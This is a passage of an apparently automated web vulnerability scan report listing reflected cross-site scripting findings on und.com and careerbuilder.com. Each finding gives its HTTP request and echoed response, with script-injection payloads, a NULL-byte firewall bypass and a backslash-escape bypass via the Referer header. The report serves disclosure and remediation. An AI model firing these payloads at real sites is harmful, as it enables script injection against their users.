Path:   /sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0053aec"><script>alert(1)</script>9887020dffd was submitted in the REST URL parameter 6. This input was echoed as 53aec"><script>alert(1)</script>9887020dffd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sports/m-footbl/grfx.cstv.com/schools/nd/graphics%0053aec"><script>alert(1)</script>9887020dffd/spacer.gif HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:38 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/grfx.cstv.com/graphics%0053aec"><script>alert(1)</script>9887020dffd/spacer.gif','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.104. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92629"><script>alert(1)</script>466b89af49f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/grfx.cstv.com/schools/nd/graphics/92629"><script>alert(1)</script>466b89af49f HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:47 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/grfx.cstv.com/graphics/92629"><script>alert(1)</script>466b89af49f','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.105. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/nd-m-footbl-body.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e33e1"><script>alert(1)</script>59106a1eb00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sportse33e1"><script>alert(1)</script>59106a1eb00/m-footbl/nd-m-footbl-body.html HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:42 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sportse33e1"><script>alert(1)</script>59106a1eb00/m-footbl/nd-m-footbl-body.html','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.106. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/nd-m-footbl-body.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52f3e"><script>alert(1)</script>1d9cd5ff859 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl52f3e"><script>alert(1)</script>1d9cd5ff859/nd-m-footbl-body.html HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:43 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl52f3e"><script>alert(1)</script>1d9cd5ff859/nd-m-footbl-body.html','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.107. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/nd-m-footbl-body.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8872"><script>alert(1)</script>1a0b9476a33 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/nd-m-footbl-body.htmld8872"><script>alert(1)</script>1a0b9476a33 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:43 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/nd-m-footbl-body.htmld8872"><script>alert(1)</script>1a0b9476a33','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.108. http://www.careerbuilder.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 760d3\'%3balert(1)//6256a6e010 was submitted in the Referer HTTP header. This input was echoed as 760d3\\';alert(1)//6256a6e010 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET / HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=760d3\'%3balert(1)//6256a6e010

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51678
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR23
Date: Sun, 04 Sep 2011 01:25:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
eName='JS_Home - ';
s_cb.server='www';
s_cb.channel='JS_Home';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 760d3\\';alert(1)//6256a6e010';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.109. http://www.careerbuilder.com/JobPoster/Products/PostJobsInfo.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /JobPoster/Products/PostJobsInfo.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae719\'%3balert(1)//278deaa3ac4 was submitted in the Referer HTTP header. This input was echoed as ae719\\';alert(1)//278deaa3ac4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /JobPoster/Products/PostJobsInfo.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ae719\'%3balert(1)//278deaa3ac4

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36528
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR36
Date: Sun, 04 Sep 2011 01:25:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
ntent';
s_cb.events='scOpen';
s_cb.prop1='SMB_ProdJobPosting';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar17='natural (google) - ae719\\';alert(1)//278deaa3ac4';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.110. http://www.careerbuilder.com/JobSeeker/Jobs/JobDetails.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /JobSeeker/Jobs/JobDetails.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f332d\'%3balert(1)//4d1d49b1000 was submitted in the Referer HTTP header. This input was echoed as f332d\\';alert(1)//4d1d49b1000 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /JobSeeker/Jobs/JobDetails.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f332d\'%3balert(1)//4d1d49b1000

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31143
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR3
Date: Sun, 04 Sep 2011 01:25:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
s_cb.channel='JS_FindJobs';
s_cb.prop1='My Job Recommendations';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - f332d\\';alert(1)//4d1d49b1000';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.111. http://www.careerbuilder.com/JobSeeker/Jobs/JobQuery.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /JobSeeker/Jobs/JobQuery.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99c17\'%3balert(1)//a7511effd3e was submitted in the Referer HTTP header. This input was echoed as 99c17\\';alert(1)//a7511effd3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /JobSeeker/Jobs/JobQuery.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=99c17\'%3balert(1)//a7511effd3e

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 185170
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR6
Date: Sun, 04 Sep 2011 01:26:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
='Job Results';
s_cb.eVar5='JS_AS_Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14=', ';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 99c17\\';alert(1)//a7511effd3e';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.112. http://www.careerbuilder.com/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5782b\'%3balert(1)//ac6c016cb7e was submitted in the Referer HTTP header. This input was echoed as 5782b\\';alert(1)//ac6c016cb7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5782b\'%3balert(1)//ac6c016cb7e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34386
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEARWEB54
Date: Sun, 04 Sep 2011 01:25:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
Resumes - ';
s_cb.server='www';
s_cb.channel='JS_PostResumes';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 5782b\\';alert(1)//ac6c016cb7e';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.113. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /Jobseeker/Jobs/JobResults.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19088\'%3balert(1)//259c27b2205 was submitted in the Referer HTTP header. This input was echoed as 19088\\';alert(1)//259c27b2205 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /Jobseeker/Jobs/JobResults.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=19088\'%3balert(1)//259c27b2205

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 182684
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR25
Date: Sun, 04 Sep 2011 01:25:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
='Job Results';
s_cb.eVar5='JS_AS_Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14=', ';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 19088\\';alert(1)//259c27b2205';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.114. http://www.careerbuilder.com/PLI/R/JSToolkit.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /PLI/R/JSToolkit.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a46ea\'%3balert(1)//ccd1a479379 was submitted in the Referer HTTP header. This input was echoed as a46ea\\';alert(1)//ccd1a479379 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /PLI/R/JSToolkit.htm HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
